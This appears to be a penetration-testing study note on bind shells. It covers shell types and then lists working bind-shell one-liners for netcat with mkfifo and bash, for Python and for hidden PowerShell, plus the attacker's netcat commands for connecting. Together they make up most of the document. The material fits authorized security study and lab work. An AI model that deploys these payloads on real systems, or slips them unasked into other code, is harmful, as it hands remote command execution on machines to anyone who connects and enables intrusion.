Bind shells
All about shells
Shell Type | Description |
---|---|
Reverse shell |
Initiates a connection back to a "listener" on our attack box. |
Bind shell |
"Binds" to a specific port on the target host and waits for a connection from our attack box. |
Web shell |
Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a PHP script to run a single command. |
In a bind-shell the attacking machine initiates a connection to a listener port on the victim's machine.
A basic connection (not a bind shell as there is no interaction with the OS and file system) would be:
# Listener listening in the victim's machine, the target
nc -lvnp $port
# Attacker's machine making the connection
nc -nv $ipVictim $port
Bind shell connections
First step in this attack is always initiating the listening connection on port $port on the victim's machine, IP $ipVictim.
bash
We had complete control over both our attack box and the target system;
# From the victim's machine
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l $ipVictim $port > /tmp/f
### nc -l $ipVictim $port -> This binds to a specific IP address (denoted by `$ipVictim`). This is useful in multi-homed systems where the machine has more than one network interface, and you want to bind netcat to a particular IP address/interface.
# From the attacker machine
nc -nv $ipVictim $port
# From the victim's machine
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp $port >/tmp/f
### nc -lvp $port -> This binds to any available network interface on the machine. It listens on the specified port, but it will accept connections on all network interfaces (e.g., localhost, LAN IP, etc.), which might be less restrictive.
# From the attacker machine
nc -nv $ipVictim $port
netcat
python
python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
Second step: If we have succeeded in previous step, we have a shell waiting for us on the specified port (1234) in the victim's machine. Now, let's connect to it from our attacking machine:
nc 10.10.10.1 1234
# 10.10.10.1 would be the victim's machine
# 1234 would be the listening port on victim's machine
Unlike a Reverse Shell, if we drop our connection to a bind shell for any reason, we can connect back to it and get another connection immediately. However, if the bind shell command is stopped for any reason, or if the remote host is rebooted, we would still lose our access to the remote host and will have to exploit it again to gain access.
Some more resources
Reverse shell | Link to resource |
---|---|
PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet.md) |